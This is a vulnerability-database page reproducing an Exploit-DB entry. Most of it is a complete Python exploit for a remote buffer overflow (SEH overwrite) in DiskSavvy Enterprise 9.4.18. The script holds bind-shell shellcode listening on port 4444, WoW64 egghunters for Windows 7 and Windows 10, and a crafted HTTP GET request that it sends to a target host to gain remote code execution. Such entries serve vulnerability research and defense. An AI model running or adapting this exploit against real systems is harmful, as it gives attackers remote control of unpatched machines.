DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters

vendor:

DiskSavvy Enterprise

by:

Peter Baris

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: DiskSavvy Enterprise

Affected Version From: 9.4.18

Affected Version To: 9.4.18

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Pro SP1 x64, Windows 10 Pro x64

2017

DiskSavvy Enterprise 9.4.18 – Remote buffer overflow – SEH overwrite with WoW64 egghunters

This exploit takes advantage of a remote buffer overflow vulnerability in DiskSavvy Enterprise version 9.4.18. It uses a SEH overwrite technique with WoW64 egghunters to gain remote code execution. The exploit is specifically designed for 64-bit operating systems. It includes a modified version of the original Win7 egghunter and a Win10 WoW64 egghunter. If a WoW64 egghunter is needed for other Windows versions, the author can be contacted through their website.

Mitigation:

Update to a patched version of DiskSavvy Enterprise.

Source

Exploit-DB raw data:

# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters 
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64

# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php

import socket
import sys

try:
    host = sys.argv[1]
    os = sys.argv[2]
    port = 80
except IndexError:
    print "[+] Usage %s <host>  win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()


# 355 bytes bind shell, PORT 4444,  bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")

crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"

if os == "win7":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2" 
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8" 
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")

elif os == "win10":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")

else:
  print "[!] This windows version is not supported yet"
  exit(0)

exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops  + shell + filler

buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()